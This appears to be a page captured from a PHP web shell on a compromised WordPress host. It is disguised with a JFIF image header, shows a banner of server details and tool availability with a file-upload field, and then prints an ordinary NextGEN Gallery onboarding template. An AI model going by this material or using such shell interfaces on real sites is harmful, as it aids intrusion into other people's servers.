????JFIF??x?x????'
Server IP : 104.21.64.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/self/cwd/wp-content/plugins/nextgen-gallery/src/Admin/Views/onboarding-wizard/ |
Upload File : |
<?php /** * Outputs the welcome step of the Onboarding Wizard. * * @since 3.59.4 * * @package NextGEN Gallery */ ?> <!-- logo --> <img width="339" src="<?php echo esc_url( trailingslashit( NGG_PLUGIN_URI ) . 'assets/images/logo.svg' ); ?>" alt="NextGEN Gallery" class="nextgen-gallery-onboarding-wizard-logo"> <div class="nextgen-gallery-onboarding-wizard-step nextgen-gallery-onboarding-wizard-step-welcome"> <div class="nextgen-gallery-onboarding-welcome-content"> <h1><?php esc_html_e( 'Welcome to NextGEN Setup Wizard!', 'nextgen-gallery' ); ?></h1> <p><?php esc_html_e( 'Crafting exquisite, responsive photo and video galleries for your website takes just minutes. You are only 5 minutes away for creating your first gallery!', 'nextgen-gallery' ); ?></p> <div class="nextgen-gallery-onboarding-wizard-cta"> <a href="#" class="button nextgen-gallery-onboarding-wizard-primary-btn btn-large nextgen-gallery-button-dark nextgen-gallery-button-primary" id="nextgen-gallery-get-started-btn"><?php esc_html_e( 'Let\'s Get Started → ', 'nextgen-gallery' ); ?></a> </div> </div> </div> <a href="<?php echo esc_url( admin_url( '/admin.php?page=ngg_other_options' ) ); ?>" class="nextgen-gallery-onboarding-wizard-back-btn">← <?php esc_html_e( 'Go back to the dashboard', 'nextgen-gallery' ); ?></a>